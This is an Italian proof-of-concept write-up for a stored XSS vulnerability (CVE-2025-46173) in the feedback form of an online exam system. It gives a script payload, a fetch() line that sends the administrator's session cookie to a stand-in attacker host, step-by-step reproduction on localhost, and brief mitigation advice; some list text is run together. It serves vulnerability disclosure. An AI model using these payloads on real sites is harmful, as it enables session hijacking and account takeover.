
PoC per la CVE-2025-46173
CVE-2025-46173 è una vulnerabilità di Cross-Site Scripting (XSS) memorizzato scoperta in Online Exam Mastering System 1.0 di code-projects. La vulnerabilità è presente nel componente feedback.php, dove l'input utente nel campo nome non viene adeguatamente sanificato, consentendo a un attaccante di iniettare JavaScript arbitrario. Quando un amministratore visualizza il feedback nella dashboard di amministrazione (dash.php), il payload viene eseguito nel browser dell'amministratore, portando al dirottamento della sessione e a una potenziale escalation dei privilegi.
feedback.php, dash.phpUn utente invia il seguente payload nel campo Nome nel modulo di feedback:
<script>alert(document.cookie)</script>

Quando l'amministratore visualizza successivamente il feedback inviato in dash.php, il payload viene eseguito:

Il cookie di sessione dell'amministratore viene esposto tramite document.cookie e può essere esfiltrato:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
Clonare o configurare la versione vulnerabile da code-projects.
Navigare a localhost/exam/feedback.php.
Compilare il campo "Nome" con:
<script>alert(document.cookie)</script>
Inviare il modulo.
Accedere come amministratore e visitare dash.php?q=3 per visualizzare il feedback.
Lo script verrà eseguito nel contesto dell'amministratore.
Lo sfruttamento riuscito consente a un attaccante remoto di:
&, <, >, ").htmlspecialchars() di PHP o una combinazione di validazione frontend e sanificazione backend.Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
Gli screenshot sono solo a scopo educativo. Tutti i test sono stati effettuati in un ambiente locale.
Queste informazioni sono fornite solo a scopo educativo e di ricerca. Non utilizzarle su sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita a testare.